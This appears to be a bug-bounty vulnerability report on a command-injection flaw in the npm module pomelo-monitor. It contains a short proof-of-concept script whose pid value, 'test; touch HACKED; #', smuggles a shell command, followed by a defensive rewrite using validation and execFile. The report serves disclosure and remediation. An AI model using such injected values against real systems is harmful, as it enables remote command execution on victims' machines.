// poc.js
var monitor = require('pomelo-monitor');
var param = {pid: 'test; touch HACKED; #', serverId: 'node-1'};
monitor.psmonitor.getPsInfo(param, function(err, data) {});
Check there aren't files called HACKED
Execute the following commands in another terminal:
npm i pomelo-monitor # Install affected module
node poc.js # Run the PoC
Recheck the files: now HACKED has been created
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded :moneybag:? Go to https://huntr.dev/
This issue has been generated on-behalf of Mik317 (https://app.huntr.dev/users/Mik317)
Details
I would like to report an RCE issue in the pomelo-monitor module. It allows executing arbitrary commands remotely inside the victim's PC.
Vulnerability Description
The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/halfblood369/monitor/blob/master/lib/processMonitor.js#L26
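A defensive counterpart to the flaw described under Vulnerability Description, added here as an example; it is not part of the original report and not the pomelo-monitor code. The names `parsePid`, `buildPsArgs` and `getPsInfoSafe`, and the choice of `ps` columns, are assumptions made for the illustration.

```javascript
const { execFile } = require('child_process');

// Hypothetical helper: accept only a decimal process id, returned as a string.
function parsePid(value) {
  const text = String(value);
  if (!/^[1-9][0-9]{0,9}$/.test(text)) {
    throw new TypeError('pid must be a positive decimal integer');
  }
  return text;
}

// Hypothetical helper: build an argument vector for ps. The column choice is an
// assumption for this example; "-o name=" prints a column without a header.
function buildPsArgs(param) {
  const columns = ['pid', 'pcpu', 'pmem', 'vsz', 'rss'];
  const args = [];
  for (const name of columns) args.push('-o', name + '=');
  args.push('-p', parsePid(param.pid));
  return args;
}

// execFile starts ps directly with the argument vector, so no shell ever
// parses the pid and ';', '|' or '#' have no special meaning.
function getPsInfoSafe(param, callback) {
  let args;
  try {
    args = buildPsArgs(param);
  } catch (err) {
    return callback(err); // rejected before any process is started
  }
  execFile('ps', args, { timeout: 5000 }, (err, stdout) => {
    if (err) return callback(err);
    const [pid, cpu, mem, vsz, rss] = stdout.trim().split(/\s+/);
    callback(null, { serverId: param.serverId, pid, cpu, mem, vsz, rss });
  });
}

// Constructed input: the param object from poc.js above.
getPsInfoSafe({ pid: 'test; touch HACKED; #', serverId: 'node-1' }, (err) => {
  console.log(err ? 'rejected: ' + err.message : 'unexpected success');
});
```

Validation and the shell-free `execFile` call are independent layers: either one alone stops the PoC string, and keeping both means a later change to one does not reopen the injection.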